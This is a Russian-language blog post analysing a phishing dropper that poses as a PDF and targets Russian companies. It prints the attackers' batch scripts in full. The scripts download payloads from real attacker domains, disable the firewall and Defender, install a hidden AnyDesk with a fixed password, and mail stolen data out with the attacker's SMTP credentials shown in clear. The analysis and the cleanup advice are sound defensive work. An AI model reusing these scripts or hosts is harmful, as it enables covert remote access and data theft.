Введение

Начну немного с вводной, кому неинтересно, можно сразу перейти к технической части статьи.

Недавно я пробовал пройти собеседование в Kaspersky. Ну, как пробовал, если честно даже не дошел до технического этапа :) В общем, я получил реджект. Причина отказа: "решили выйти с предложением к кандидату, который прошел все финальные встречи". Не сказать, что у меня не было опыта в реверсе. Я пару раз реверсил прошивки, но в основном тестировал способы обхода лицензий в продуктах компании. Но вот именно анализом malware как таковым не занимался. Поэтому, буду восполнять этот пробел, ну и попутно буду документировать это все в небольших статьях, поскольку когда пробуешь что-то объяснить другим, сам разбираешься в вопросе еще глубже.

Как я получил вредонос

Случайность это или нет, не знаю, но примерно в то же время, когда у меня проходил первый этап собеседования, ко мне обратилась коллега из IT-отдела. Ситуация была такова, что кто из сотрудников открыл странный PDF, полученный по почте, и обратился с вопросом: "А что это за документ, и надо ли нам на него отвечать?".

Вот сам документ, который открылся в браузере:

Статический анализ

Ну чтож, приступим к анализу. Перед нами файл с расширением .com:

Поменяем расширение на .exe, после чего появилось изображение Adobe Acrobat:

Ну раз так, пойдем смотреть, что у него в ресурсах. В них видны иконки разных размеров:

Так же в ресурсах можно найти, что использовалась лицензионная версия Delphi, причем Enterprise версия:

В метаданных сборки видно используемые модули, такие как WinInet, UrlMon для работы с сетью, так же есть shell модуль ShellAPI:

Стоит отметить, что открываемый PDF файл, а так же манифест на русском, говорит о том, что целью являются российские компании:

В манифесте так же видно строку: Smart Install Maker. Это программа для создания установочных файлов.

Из этого всего можно предположить, что перед нами установщик, который установит/запусит малварь.

После этого я решил проверить по заголовкам, когда был собран данный файл. Ну и если честно, на правду не похоже:

А вот таблица импорта достаточно объемная:

Теперь посмотрим, что насчет данного файла скажет Detect It Easy:

Посмотрим на эту часть:

Overlay: Binary [Offset = 0x00085a00, Size = 0x00048639]
	Data: Smart Install Maker data

Если открыть данный файл через hex редактор и перейти на адрес 0x00085a00, то увидим следующее:

Возможно это те самые данные файлов, которые будут устанавливаться.

Получим эти данные:

with open("Порядок представления информации организациями ОПК.com", 'rb') as f:
    data = f.read()

overlay_offset = 0x85A00
overlay_size = 0x48639

overlay_data = data[overlay_offset: overlay_offset + overlay_size]

with open("overlay.bin", 'wb') as f:
    f.write(overlay_data)

Изучим строки:

Видим такое ПО как AnyDesk для удаленного доступа к системе, различные пути реестра, а так же что-то похожее на shell команды.

Вернемся к нашей строке Smart Install Maker. Мы выяснили, что это установщик, а значит он что-то устанавливает. Немного порывшись в Интернете, я нашел unpacker всего этого дела:
https://github.com/Bioruebe/UniExtract2/releases

В папке Дополнительные файлы:

1

В файле 1 находится домен:

К сожалению, данное доменное имя не резолвится:

nslookup woffice.top 8.8.8.8                  
Server:         8.8.8.8  
Address:        8.8.8.8#53  
  
** server can't find woffice.top: NXDOMAIN

2

Файл 2 это PE файл:

Если загрузить его на VirusTotal, станет понятно, что это curl:

3

Файл 3 это bat скрипт:

echo %time%
echo>num.doc 35
ping -n 120 127.0.0.1 >nul
echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access

  • вывод текущего времени;

  • создает файл num.doc с содержимым 35;

  • делает задержку в 120 сек через ping;

  • устанавливает пароль для программы AnyDesk.

Uninstall.ini

Это файл PDF:

Изменяем расширение и можем открыть его через браузер:

А вот и тот документ, который мы уже видели.

installer.config

А этот файл является наиболее интересным. Даже само название говорит об этом:

Detect It Easy определил его просто как бинарный файл:

Проанализируем строки:

  • Adobe_Acrobat_Document 12.1.7544 - странная версия, по ссылке https://en.wikipedia.org/wiki/Adobe_Acrobat_version_history есть версия 11.0 от 2012 года, после этого они сменили наименование и 12 версии не выходило;

  • @$&%04\Uninstall.ini - pdf файл заглушка;

  • много строк реестра:
    - SOFTWARE\4t Niagara Software\4t Tray Minimizer;
    - SOFTWARE\4t Niagara Software\4t Tray Minimizer\Options;
    - SOFTWARE\4t Niagara Software\4t Tray Minimizer\Options\CustApp0;
    - SOFTWARE\4t Niagara Software\4t Tray Minimizer\Options\CustApp1;
    - SOFTWARE\4t Niagara Software\4t Tray Minimizer\Options\DefaultForAllApp;
    - SOFTWARE\4t Niagara Software\4t Tray Minimizer\Options\ExclusionList;
    - SOFTWARE\4t Niagara Software\4t Tray Minimizer\View;
    - Software\Microsoft\Windows\CurrentVersion\Run;
    а рядом с ними значения имени в реестре и само значение:

Можно предположить, что вредонос будет маскироваться под легитимное ПО 4t Tray Minimizer от 4t Niagara Software.

  • @$&%26\ - путь (а точнее переменная которая станет путем), по которому будут располагаться файлы:
    - @$&%26\Windows\Run.exe;
    - @$&%26\Windows\Trays\Trays.lnk;
    - @$&%26\Windows\pdf35.pdf;
    - @$&%26\Windows\url.txt;
    - @$&%26\Windows\find.exe;
    - @$&%26\Windows\any.bat;
    - @$&%26\Windows\pdf35.pdf.

  • А так же ветка реестра автозапуска:
    Software\Microsoft\Windows\CurrentVersion\Run с именем значения Driver Update и Userinite.

  • И еще связанные с переменной пути:
    - @$&%26\Windows\AnyDesk.exe;
    - @$&%26\Windows\AnyDesk\AnyDesk.exe;
    - @$&%26\Windows\any.bat;
    - @$&%26\Windows\find.cmd;
    - @$&%26\Windows\bat.bat.

  • Команды:

Соберем их всех вместе:

/c echo>@$&%26\\Windows\\find.cmd cd @$&%26\\Windows\\
/c echo>>@$&%26\\Windows\\find.cmd setlocal enabledelayedexpansion
/c echo>>@$&%26\\Windows\\find.cmd set \"file=@$&%26\\Windows\\url.txt\"
/c echo>>@$&%26\\Windows\\find.cmd set \"content=\"
/c echo>>@$&%26\\Windows\\find.cmd for /f \"delims=\" %%A in (%file%) do (
/c echo>>@$&%26\\Windows\\find.cmd     set \"content=!content! %%A\"
/c echo>>@$&%26\\Windows\\find.cmd )
/c echo>>@$&%26\\Windows\\find.cmd @$&%26\\Windows\\find.exe -o @$&%26\\Windows\\bk.rar %content%/bk.jpg
/c echo>>@$&%26\\Windows\\find.cmd @$&%26\\Windows\\find.exe -o @$&%26\\Windows\\driver.exe %content%/driver.jpg
/c echo>>@$&%26\\Windows\\find.cmd @$&%26\\Windows\\driver.exe x -r -ep2 -hplimpid2903392 @$&%26\\Windows\\bk.rar @$&%26\\Windows\\ /y
/c echo>>@$&%26\\Windows\\find.cmd @$&%26\\Windows\\find.exe -o @$&%26\\Windows\\pas.rar %content%/pas.jpg
/c echo>>@$&%26\\Windows\\find.cmd start @$&%26\\Windows\\Trays\\Trays.lnk
/c echo>>@$&%26\\Windows\\find.cmd @$&%26\\Windows\\driver.exe x -r -ep2 -hplimpid2903392 @$&%26\\Windows\\pas.rar blat.exe @$&%26\\Windows\\ /y
/c echo>>@$&%26\\Windows\\find.cmd @$&%26\\Windows\\driver.exe x -r -ep2 -hplimpid2903392 @$&%26\\Windows\\pas.rar AnyDesk.exe @$&%26\\Windows\\ /y
/c echo>>@$&%26\\Windows\\find.cmd @$&%26\\Windows\\driver.exe x -r -ep2 -hplimpid2903392 @$&%26\\Windows\\pas.rar bat.bat @$&%26\\Windows\\ /y
/c echo>>@$&%26\\Windows\\find.cmd del /q find.exe
/c echo>>@$&%26\\Windows\\find.cmd netsh advfirewall set allprofiles state off
/c echo>>@$&%26\\Windows\\find.cmd sc stop WinDefend
/c echo>>@$&%26\\Windows\\find.cmd net stop MpsSvc
/c echo>>@$&%26\\Windows\\find.cmd sc stop MpsSvc
/c echo>>@$&%26\\Windows\\find.cmd sc delete MpsSvc
/c echo>>@$&%26\\Windows\\find.cmd AnyDesk.exe --install @$&%26\\Windows\\AnyDesk

Почистим и получим итоговый скрипт find.cmd:

cd @$&%26\Windows\
setlocal enabledelayedexpansion

# задаем значение переменной file
set "file=@$&%26\Windows\url.txt"

# обнуляем переменную
set "content="
# построчно читаем файл и добавляем каждую строку переменной content
for /f "delims=" %%A in (%file%) do (
set "content=!content! %%A"
)  

# использование find.exe очень похоже по синтаксису с curl.exe
# скачивается архив .rar
@$&%26\Windows\find.exe -o @$&%26\Windows\bk.rar %content%/bk.jpg
# скачивается pe файл
@$&%26\Windows\find.exe -o @$&%26\Windows\driver.exe %content%/driver.jpg

# распаковывается архив bk.rar с помощью driver.exe
@$&%26\Windows\driver.exe x -r -ep2 -hplimpid2903392 @$&%26\Windows\bk.rar @$&%26\Windows\ /y

# скачивается еще один архив .rar
@$&%26\Windows\find.exe -o @$&%26\Windows\pas.rar %content%/pas.jpg

# (из гугла) этот ярлык позволяет запускать 4t Tray Minimizer свернутым в трей
start @$&%26\Windows\Trays\Trays.lnk

# распаковка blat.exe
@$&%26\Windows\driver.exe x -r -ep2 -hplimpid2903392 @$&%26\Windows\pas.rar blat.exe @$&%26\Windows\ /y
# распаковка AnyDesk.exe
@$&%26\Windows\driver.exe x -r -ep2 -hplimpid2903392 @$&%26\Windows\pas.rar AnyDesk.exe @$&%26\Windows\ /y
# распаковка driver.exe
@$&%26\Windows\driver.exe x -r -ep2 -hplimpid2903392 @$&%26\Windows\pas.rar bat.bat @$&%26\Windows\ /y

# удаляет программу find.exe
del /q find.exe  

# отключение брандмаузера
netsh advfirewall set allprofiles state off
# отключение дефендера
sc stop WinDefend
net stop MpsSvc
sc stop MpsSvc
sc delete MpsSvc

# установка AnyDesk-а
@$&%26\Windows\AnyDesk.exe --install @$&%26\Windows\AnyDesk

Можно предположить, что файл 1 и есть файл url.txt, а "картинка" bk.jpg находится по адресу:

http://woffice.top/bk.jpg

Вот только проблема в том, что данное доменное имя не резолвится.

На virustotal было найдена информация, что этот домен резолвился по ip адресу 144.124.248.174:

Если посмотреть по ip адресу, то видно похожие .com файлы:

На сайте censys.io видно, что первое упоминание этого домена зарегистрировано 31.01.2026:

А последнее упоминание 02.02.2026:

Из этого можно предположить, что компания по рассылке была кратковременной.

Поэтому на запросы приходят ответы 404 :(

Все, расходимся, кина не будет.

Где я только не пытался найти эти файлы -archive.org, urlhaus.abuse.ch, archive.ph, webcitation.org. Но нет, они про этот домен слыхать не слыхали. Так же не удалось найти данный файл на bazaar.abuse.ch.

Динамический анализ

Не смотря на то, что полностью исследовать все возможности вредоноса не получится, будет кощунством не зупустить его!

Реестр

Сокрытие бэкдора

Как и предполагалось, программа после запуска активно взаимодействовала с реестром:

Создается раздел реестра 4t Niagara Software:

Убедиться в том, что этот раздел создает установщик, можно посмотрев на эту ветку реестра до его запуска:

Для того, чтобы понять, маскируется ли малварь под 4t Niagara Software или устанавливает данное ПО, я решил установить 4t Tray Minimizer на чистую систему.

Устанавливается программа по умолчанию по пути:

C:\Program Files (x86)\4t Tray Minimizer

Так же создаются похожие разделы в реестре:

Но в случае запуска малвари данная папка не появляется, хотя структура реестра очень схожа. Значит данный малварь маскируется под ПО 4t Tray Minimizer (немного забегая вперед, оказалось это не так, и на самом деле ПО 4t Tray Minimizer используется, хоть и не находится по аналогичному пути).

Далее данный раздел начинает заполняться значениями:

Посмотрим раздел Options. Сразу в глаза бросается много параметров связанных с Tray-ем (как оказалось, эти значения появляются при использовании ПО 4t Tray Minimizer):

По крайней мере первый ключ позволит программе быть невидимой в системном трее:

Так же в руководстве eToken-а было найдено следующее:

Остальные ключи связаны с сокрытием окна программы в tray. Эти ключи аналогичны тем, что появились при установке 4t Tray Minimizer.

Смотрим далее.

В Options создается 4 раздела:

  • CustApp0;

  • CustApp1;

  • DefaultForAllApp;

  • ExclusionListl;

Два последних раздела появлялись при установке 4t Tray Minimizer. А вот на первые два посмотрим более пристально.

CustApp0

Сразу в глаза бросается ключ path со значением:

C:\Users\user\AppData\Roaming\Windows\AnyDesk.exe

Так же есть аналогичные ключи как в разделе Options:

ShowInTray False
ShowInTrayAlways False

CustApp1

Очень схожа с CustApp0, в данном случае в ключе path путь длиннее на одну папку:

C:\Users\user\AppData\Roaming\Windows\AnyDesk\AnyDesk.exe

В общем, все сводится к тому, чтобы AnyDesk запускался скрытно от пользователя.

Прописывание в автозагрузку

Раздел реестра:

Компьютер\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

отвечает за автоматический запуск программ при входе в систему текущего пользователя. Именно сюда установщик записывает два значения:

Driver Update C:\Users\user\AppData\Roaming\Windows\Trays\Trays.lnk
Userinite C:\Users\user\AppData\Roaming\Windows\Run.exe

Это именно те файлы, которые получить мне не удалось.

Отображение установленного Adobe

Раздел реестра:

Компьютер\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe_Acrobat_Document 12.1.7544

содержит информацию о якобы установленном Adobe:

Так же приложение можно найти в Приложения и возможности:

Процессы

При запуске установщика он сразу запускает дочерние процессы:

Изучим их.

Откроем первый процесс cmd.exe:

Интересующие параметры находятся в Command line и Current directory.

Откроем путь C:\Users\user\AppData\Roaming\Windows:

PING.exe, это задержка в 120 сек:

Второй процесс cmd.exe:

Та же директория, но запущен другой батник.

Давайте разберемся что это за файлы, и что они делают.

any.bat

Это копия файла 3, который был получен при распаковке установщика:

url.txt

Это копия файла 1:

find.cmd

Это bat скрипт, аналогичный тому, который мы собрали руками:

find.exe

Это утилита curl.exe, которая является копией файла 2:

num.doc

Word файл, в котором содержится значение 35, которое вносится туда скриптом any.bat:

Хотя по сути является текстовым файлом:

pdf35.pdf

Тот самый файл, который показывается пользователю при запуске установщика:

Далее процессы остаются просто висеть и признаков активности не проявляют. В трее реестра тоже становится тихо:

Сеть

После запуска программы она делает dns запрос по доменному имени woffice.top, но получает ответ, что не знает такого имени:

И, все... Дальше трафика связанного с этой программой обнаружено не было.

Это не конец!

Вы думали это все? Я тоже так думал, пока вечером меня не посетила мысль. Возможно такой способ закрепления используется другими плохими парнями, и, возможно, если взять похожий вредонос, то там будет другая ссылка на скачивание!

На следующий день я решил это проверить, обратившись к тому же коллеге из IT-отдела, который и предоставил мне вредонос с вопросом: "А не приходило ли вам еще писем с подобными файлами?". И да! Они нашлись. Я взял еще один:

Один в один как разобранный нами установщик:

Распаковываем как и первый:

Картина практически 1 в 1, но это не совсем так. Разберемся что это за файлы.

1

Это bat файл, похожий на тот, что мы разбирали, но с отличиями:

И что самое важное, с другим url адресом!

https://aero-shop.fun/hbtrfgfytr/okbkmvfdrgthyndbvre.rar

К нему мы вернемся позже, а пока посмотрим на другие файлы.

2

Это PE файл:

И это похоже один из файлов, который не получилось изучить в прошлом семпле:

Если судить по использованию в данной программы в bat-нике, то можно предположить что это архиватор. На это так же указывают строки:

3

Это тоже PE файл:

И на VirusTotal он фигурирует как Uninstall.exe:

Скорее всего является деинсталятором и относится к изначальному установщику:

Uninstall.exe

А вот этот файл на самом деле не exe, а документ Word:

installer.config

Аналогичен с таким же файлом из первого семпла.

Получаем недостающие пазлы

Вернемся к url адресу из bat-ника и попробуем скачать архив:

curl -k -L -o C:\Users\user\Desktop\Malware\Download\okbkmvfdrgthyndbvre.rar --resolve aero-shop.fun:443:68.65.120.138 https://aero-shop.fun/hbtrfgfytr/okbkmvfdrgthyndbvre.rar

Но скачивается не архив, а html ответ от сервера:

По имени архива, который должен скачаться, так же ничего не находится:

Попробуем поискать дальше. Меня зацепила строка в bat файле:

limpid29033

Забив ее в гугле, нахожу страницу на Any.run:
https://any.run/report/2ba8de5f38b239404341da0a615b50b6c57830a3f7e89fed309c920878fd6508/2d03e1cb-c4ba-4aa5-a574-2dac1be5f20b#MalConf

Перехожу на страницу анализа:
https://app.any.run/tasks/2d03e1cb-c4ba-4aa5-a574-2dac1be5f20b

Вижу запрос curl, но уже с другим именем архива - jgbfsofrtysdfd.rar:

Пробую найти по нему и нахожу эту страницу:
https://tria.ge/251224-pmpm3axpfw/static1

Скачиваем его:

Распаковываю используя пароль из bat-ника - limpid29033:

Получаю следующие файлы:

А вот папка Trays очень похожа на то, что было при установке 4t Tray Minimizer.

Папка: C:\Program Files (x86)\4t Tray Minimizer после нормальной установки:

Папка Trays из скачанного архива:

Значит все таки программа 4t Tray Minimizer используется для сокрытия.

А вот AnyDesk используется не модифицированный:

Разберем подробней, что делает bat файл во втором семпле:

cd "C:\Nvidia\config"

# скачивание архива
curl.exe -k -L -o C:\Nvidia\config\okbkmvfdrgthyndbvre.rar --resolve aero-shop.fun:443:68.65.120.138 https://aero-shop.fun/hbtrfgfytr/okbkmvfdrgthyndbvre.rar

# задержка в 14 сек
ping -n 14 127.0.0.1

# распаковка архива
C:\Nvidia\config\driver.exe x -r -ep2 -p"limpid29033" C:\Nvidia\config\okbkmvfdrgthyndbvre.rar C:\Nvidia\config /y

# задержка в 65 сек
ping -n 65 127.0.0.1

# запуск программы 4t Tray Minimizer
start C:\Nvidia\config\Trays\Trays.exe -tray

# установка AnyDesk-а
C:\Nvidia\config\AnyDesk.exe AnyDesk.exe --install C:\Nvidia\config\AnyDesk

# установка пароля для AnyDesk-а
echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access

# задержка в 63 сек
ping -n 63 127.0.0.1

# архивация данных Appdata AnyDesk-а
C:\Nvidia\config\driver.exe a -r -ep -hplimpid2903392 C:\Nvidia\config\AnyDesk.rar %Appdata%\AnyDesk  /y

# архивация данных Programdata AnyDesk-а
C:\Nvidia\config\driver.exe a -r -ep -hplimpid2903392 C:\Nvidia\config\AnyDesk1.rar %Programdata%\AnyDesk  /y

# отправка данных Appdata AnyDesk-а злоумышленнику 
C:\Nvidia\config\blat.exe -to outing@vniir.nl -f "gjrijgk<putt@vniir.nl>" -server mail.vniir.nl -port 587 -u putt@vniir.nl -pw fXDfwZGMA4zmCNZH6eu5 -subject  "jmhnbgvf %COMPUTERNAME%/%USERNAME%" -body  "hfngbgfbgf %COMPUTERNAME%/%USERNAME%" -attach "C:\Nvidia\config\AnyDesk.rar"

# отправка данных Programdata AnyDesk-а злоумышленнику
C:\Nvidia\config\blat.exe -to outing@vniir.nl -f "gjrijgk<putt@vniir.nl>" -server mail.vniir.nl -port 587 -u putt@vniir.nl -pw fXDfwZGMA4zmCNZH6eu5 -subject  "gfbgvdc %COMPUTERNAME%/%USERNAME%" -body  "hfngbgfbgf %COMPUTERNAME%/%USERNAME%" -attach "C:\Nvidia\config\AnyDesk1.rar"

# удаляет все архивы
del /q  C:\Nvidia\config\*.rar

# создает задачу на автозапуск 4t Tray Minimizer при входе пользователя
schtasks /create /tn "Auto apdate" /tr "\"C:\Nvidia\config\Trays\Trays.exe\" -tray" /sc onlogon /rl highest /f

# создает задачу на автозапуск AntDesk-а при входе пользователя
schtasks /create /tn "Microsoft Update" /tr "C:\Nvidia\config\AnyDesk\Anydesk.exe" /sc onlogon /rl highest /f

# удаление программы для отправки сообщений по почте
del /q C:\Nvidia\config\blat.exe

Предположение о том, что файл driver.exe это на самом деле архиватор подтвердилась.

Теперь ситуация прояснилась. Зловред подготавливает реестр для того, чтобы используя ПО 4t Tray Minimizer запускать AnyDesk незаметно для пользователя, без окна, без иконки в трее. После чего информация собирается, упаковывается в архивы и отправляется на почту злоумышленнику.

Как найти

До этого с программой 4t Tray Minimizer я не работал, поэтому мне стало интересно посмотреть, как будет отображаться такой вот спрятанный AnyDesk.

Запустим программу Trays.exe, которая запускалась бы при отработке bat-ника:

Теперь запустим AnyDesk.exe и установим ее, программа видна как окно, видна в панели задач, есть иконка в трее:

Нажимаем на New, нацеливаемся на окно AnyDesk:

После сворачивания AnyDesk пропал с панели задач:

А так же пропал один значок, но второй значок у меня так скрыть и не удалось (если кто знает как это сделать, напишите, пожалуйста, в комментариях):

Но понятное дело, что даже в таком случае процесс никуда не пропадет и будет отображаться в диспетчере задач:

И в автозагрузках:

Убираем его, перезагружаем машину и видим снова, но уже как фоновый процесс:

А все потому, что AnyDesk запускается дополнительно как служба:

Останавливаем и удаляем. Так же удаляем само приложение AnyDesk:

Так же удаляем папки, в который разместилась малварь:

C:\Users\user\AppData\
C:\Nvidia\

В разных семплах они различаются, поэтому в какой точно папке будет располагаться тот или иной семпл сказать сложно.

Так же нужно очистить реестр, удалив дерево:

Компьютер\HKEY_CURRENT_USER\SOFTWARE\4t Niagara Software

А так же то что прописалось в автозагрузку:

Компьютер\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Это основные действия, которые нужно провести в зараженной машине.

Вывод

Достаточно интересная идея, использовать легитимное ПО, про которое слышал каждый сисадмин, как средство закрепления в системе, так еще и прятать его другим легитимным ПО. По сути после отработки всей полезной нагрузки злоумышленники получают полный контроль над компьютером со всеми плюшками графического интерфейса.

Мораль истории такова, что пользователям все-таки стоит периодически напоминать, что если они не ждали письма и отправителя не знают, то содержимое письма стоит хотя бы проверить через Virus Total, а лучше настроить средства защиты так, чтобы они не допускали подобные файлы до пользователя.

Надеюсь, статья была вам интересной, а если я упустил что-то, или трактовал как то не так, прошу указать мне это в комментариях. Да прибудет с вами безопасность :)